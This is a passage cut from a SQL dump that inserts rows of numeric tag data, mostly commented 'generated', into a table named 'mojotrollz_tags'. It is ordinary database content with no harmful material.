2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149031, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149032, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149036, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149038, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149045, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149046, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149047, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149048, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149049, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149410, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149412, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149413, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149417, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149418, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149419, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149420, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149424, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149431, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149431, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149432, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149432, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149433, 2, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149433, 2, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149480, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149481, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149482, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149483, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (149502, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150075, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150079, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150080, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150081, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150082, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150086, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150087, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150137, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150138, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150140, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (150713, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151286, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151951, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151951, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151952, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151952, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151953, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151954, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151955, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151956, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151957, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151958, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151959, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151960, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151961, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151962, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151963, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151964, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151965, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151966, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151967, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151968, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151969, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151970, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151971, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151972, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151973, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151973, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151974, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151975, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151976, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151977, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151978, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151979, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151980, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151981, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151982, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151983, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151984, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152032, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152033, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152034, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152035, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152037, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152038, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152039, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152040, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152041, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152042, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152043, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152044, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152045, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152046, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152094, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152095, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152097, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152097, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152098, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152324, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152325, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152326, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152327, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152328, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152329, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152330, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152331, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152332, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152574, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152575, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152576, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152577, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152578, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152579, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152580, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152581, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152582, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152584, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152585, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152586, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152587, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152608, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152614, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152618, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152619, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152620, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152621, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152622, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152631, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153123, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153124, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153125, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153126, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153157, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153158, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153159, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153160, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153203, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153204, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153205, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153220, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153221, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153239, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153240, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153241, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153242, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153350, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153399, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153400, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153402, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153451, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153453, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153454, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153459, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153460, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153464, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153464, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153464, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153464, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153468, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153469, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153469, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153469, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153469, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153470, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153471, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153472, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153473, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153482, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153516, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153556, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153576, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153577, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153578, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153579, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153580, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153581, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153582, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153583, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153584, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153695, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153716, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153723, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153723, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153723, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (153723, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (154357, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (156561, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157636, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157637, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157816, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157816, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157817, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157817, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157818, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157818, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157819, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157819, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157820, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157820, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157923, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157936, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157968, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157969, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158545, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158546, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158547, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158548, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158549, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158550, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158551, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158552, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158553, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158554, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158555, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158556, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158557, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158558, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158559, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158560, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158561, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158562, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158563, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158564, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158565, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158566, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158567, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158568, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158569, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158570, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158571, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158572, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158576, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158579, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158580, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158581, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158582, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158583, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158584, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (158585, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, 